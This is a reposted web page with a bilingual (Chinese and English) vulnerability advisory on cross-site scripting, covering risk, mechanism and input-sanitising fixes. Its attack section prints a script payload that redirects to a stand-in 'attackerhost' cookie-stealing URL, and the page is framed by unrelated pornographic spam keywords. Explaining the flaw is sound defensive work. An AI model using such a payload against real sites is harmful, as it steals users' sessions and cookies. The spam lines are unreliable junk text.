欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費電子書(shū)等14項超值服

開(kāi)通VIP
Cross
Cross-Site Scripting
應用程序問(wèn)題
WASC分類(lèi): Cross-Site Scripting
分為:non-persistent and persistent(如放在BBS、bulletin boards..)
參考:http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtml
錯誤等級:
嚴重(High)
風(fēng)險:
可以偷盜或者操作用戶(hù)Session和Cookie,這樣攻擊者可以扮演一個(gè)合法的客戶(hù)進(jìn)行操作。
技術(shù)說(shuō)明:
Cross-Site Scripting是一種秘密攻擊行為,它能使得攻擊者獲得合法客戶(hù)的身份和特定的服務(wù)器進(jìn)行交互。攻擊者利用這樣一個(gè)事實(shí):網(wǎng)站未對用戶(hù)在頁(yè)面中輸入的JavaScript(通常是作為參數值)進(jìn)行清洗(消毒)。這樣,當在返回信息中包含這段JavaScript代碼,這段代碼就會(huì )在客戶(hù)端的Browser中執行。這樣可能形成一個(gè)指向帶有惡意代碼的網(wǎng)站鏈接。這串代碼在這個(gè)站點(diǎn)環(huán)境中就會(huì )執行,收集可以獲取的這個(gè)站點(diǎn)或者正在瀏覽這個(gè)網(wǎng)站的其他窗口的cookie,
攻擊者會(huì )做進(jìn)一步處理:攻擊者會(huì )誘使用戶(hù)點(diǎn)擊這個(gè)由攻擊者生成的鏈接。如果用戶(hù)點(diǎn)了這個(gè)鏈接,將會(huì )向包含惡意代碼作為參數的網(wǎng)站發(fā)起一個(gè)請求。如果這個(gè)網(wǎng)站將這串參數值(惡意代碼)嵌入在返回中,惡意代碼將在客戶(hù)端的瀏覽器中執行:
惡意代碼可能會(huì )做:
1.       將用戶(hù)的cookie發(fā)送給攻擊者
2.       將能夠通過(guò)Dom(URLs, Form field 。。。)取到的信息發(fā)送給攻擊者
結果是客戶(hù)的安全性受到了威脅。
一些注釋?zhuān)?div style="height:15px;">
1.       雖然攻擊者的Web Site也被卷入,但是并沒(méi)有直接包含進(jìn)來(lái)。攻擊者通過(guò)采用“jump station”方式將返回客戶(hù),好像是合法的(It is used as a ‘jump station‘ for the malicious script sent by the attacker, to return to the victim‘s browser, as if it is legitimate.)。無(wú)論如何,由于用戶(hù)是在使用這個(gè)特定的網(wǎng)站,而且是這個(gè)網(wǎng)站的直接返回,因此可以認為是這個(gè)網(wǎng)站的安全漏洞。
2.     這個(gè)懷有惡意的鏈接由攻擊者生成,可以包含在攻擊者自己維護的網(wǎng)站中。這個(gè)鏈接攻擊者也可以通過(guò)發(fā)送email的方式發(fā)送給受害人。
3.     由于用戶(hù)輸入是作為form的字段值,可以知道這串惡意代碼從什么地方來(lái)的,
4.       各種瀏覽器實(shí)現的不一樣,有時(shí)候在這種瀏覽器上沒(méi)有問(wèn)題,但是換一種瀏覽器就會(huì )有問(wèn)題。
攻擊方法:
寫(xiě)一個(gè)鏈接:  參數值為:
<SCRIPT>
document.location= ‘http://attackerhost.example/cgi-bin/cookiesteal.cgi?+document.cookie
</SCRIPT>
這樣,當服務(wù)器返回時(shí),上面這串腳本將自動(dòng)執行,將本地的Cookie發(fā)現指定的URL,用戶(hù)資料泄露了。
解決方式:
1.       加強對參數的校驗:
一定要做,大量的漏洞都是針對參數未作校驗引出很多攻擊手法(會(huì )有如何檢查參數的單獨說(shuō)明)
Cross-Site Scripting
Application
WASC Threat Classification
Client-side Attacks: Cross-site Scripting
http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtml
CVE Reference(s)
N/A
Security Risks
It is possible to steal or manipulate customer session and cookies, which may be used to impersonate a legitimate user, allowing the hacker to view or alter user records, and to perform transactions as that user
Possible Causes
Sanitation of hazardous characters was not performed correctly on user input
Technical Description
The Cross-Site Scripting attack is a privacy violation, that allows an attacker to acquire a legitimate user‘s credentials and to impersonate that user when interacting with a specific website. The attack hinges on the fact that the web site contains a script that returns a user‘s input (usually a parameter value) in an HTML page, without first sanitizing the input. This allows an input consisting of JavaScript code to be executed by the browser when the script returns this input in the response page. As a result, it is possible to form links to the site where one of the parameters consists of malicious JavaScript code. This code will be executed (by a user‘s browser) in the site context, granting it access to cookies that the user has for the site, and other windows in the site through the user‘s browser.
The attack proceeds as follows: The attacker lures the legitimate user to click on a link that was produced by the attacker. When the user clicks on the link, this generates a request to the web-site containing a parameter value with malicious JavaScript code. If the web-site embeds this parameter value into the response HTML page (this is the essence of the site issue), the malicious code will run in the user‘s browser.
Possible actions that can be performed by the script are:
[1] Send user‘s cookies (for the legitimate site) to the attacker.
[2] Send information that is accessible through the DOM (URLs, Form fields, etc.), to the attacker.
The result is that the security and privacy of the victim user is compromised on the vulnerable site.
Some notes:
[1] Although the attacked web site is involved, it is not compromised directly. It is used as a ‘jump station‘ for the malicious script sent by the attacker, to return to the victim‘s browser, as if it is legitimate. However, since the privacy of the victim is breached in the context of the specific site, and since the site is directly responsible, it is considered a security flaw in the site.
[2] The malicious link can be provided by the attacker, using a web site link, if the attacker maintains a site that is visited by the victim user. The malicious link can also be provided by email, if the attacker knows the user‘s email address, and the user‘s email client uses the browser to render the HTML message.
[3] While user input is most commonly found in form field values (i.e. URL parameters), there are known attacks where the malicious code is embedded in the path, query, or in the HTTP Referrer headers, and even in cookies.
[4] AppScan sends many types of Cross-Site Scripting attacks, including attacks that work only on specific browsers or versions of browsers. AppScan‘s "Show in Browser" feature uses Internet Explorer to show the vulnerability. In the case of variants to which Internet Explorer is not vulnerable, but other browsers are, the "Show in Browser" facility does not work and the popup is not shown. There are two possible scenarios for sending input to a web application that is vulnerable to cross-site scripting:
General Fix Recommendations
There are several issues whose remediation lies in sanitizing user input.
By verifying that user input does not contain hazardous characters, it is possible to prevent malicious users from causing your application to execute unintended operations, such as launch arbitrary SQL queries, embed Javascript code to be executed on the client side, run various operating system commands etc.
本站僅提供存儲服務(wù),所有內容均由用戶(hù)發(fā)布,如發(fā)現有害或侵權內容,請點(diǎn)擊舉報。
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
Massive Web attack gains momentum
Cross-Browser XMLHttpRequest - Web Site Design - Andrew Gregory‘s Web Pages
Defense.gov News Article: DOD Releases First ...
Apple hits back at malware in China
[YA-10] APT攻擊之木馬系列—植入方式
護士日常(英語(yǔ))常用語(yǔ)丨每天10句
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導長(cháng)圖 關(guān)注 下載文章
綁定賬號成功
后續可登錄賬號暢享VIP特權!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久